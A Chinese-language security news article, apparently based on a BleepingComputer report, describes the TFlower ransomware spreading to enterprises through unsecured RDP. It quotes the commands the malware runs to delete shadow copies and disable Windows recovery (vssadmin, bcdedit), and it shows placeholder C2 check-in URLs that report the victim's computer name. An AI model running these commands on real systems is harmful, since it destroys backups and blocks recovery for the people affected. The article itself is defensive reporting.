目标锁定企业环境的最新勒索软件被命名为“TFlower”,正通过未得到安全保护的远程桌面服务(RDP)传播。也就是说,它是在攻击者通过RDP服务侵入受害者电脑后手动安装的。
据外媒BleepingComputer报道,这种新型勒索软件实际上是由白帽黑客GrujaRS在上个月初发现的,但直到最近才开始大规模爆发,一些企业和政府机构已经遭到感染。
通过RDP获取电脑访问权限
如上所述,TFlower在攻击者通过未得到安全保护的RDP服务侵入受害者电脑后手动安装的。
一旦攻击者获取到了对目标电脑的访问权限,他们就会在本地安装TFlower,甚至可能会通过PowerShell Empire、PSExec等工具来遍历网络。
TFlower勒索软件的加密流程
在执行时,TFlower将显示一个控制台窗口,高调地展示它的加密过程。
图1.TFlower控制台窗口
然后,它将与命令和控制(C2)服务器建立通信,以便进行状态检查。在BleepingComputer看到的一个样本中,C2服务器是一个被黑掉的Wordpress网站,并使用了如下地址:
https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=start
接下来,它将尝试删除卷影副本,并执行禁用Windows 10修复环境的命令。
vssadmin.exe delete shadows /all /quiet
bcdedit.exe /set {default} recoveryenabled no
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {current} recoveryenabled no
bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures
此外,它还会查找并杀死Outlook.exe进程,以便允许打开其数据文件打开进行加密。
图2.杀死Outlook.exe进程
紧接着,它将继续加密受感染电脑上的文件(会跳过Windows或Sample Music文件夹)。
加密文件时,它不会添加额外扩展名,但会添加“* tflower”标记以及该文件的加密密钥(经过加密处理),如下所示。
图3.经TFlower加密后的文件
加密完成后,它将以如下形式向C2服务器发送另一个状态更新:
https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=success%20[encrypted_file_count],%20retry%20[retried_file_count]
最后,一个名为“!_Notice_!.txt”的赎金票据就会出现在受感染电脑的桌面上。
图4.TFlower勒索软件的赎金票据
到目前为止,针对TFlower勒索软件的研究仍在进行当中,因此尚没有可以用来免费恢复被其加密文件的方法。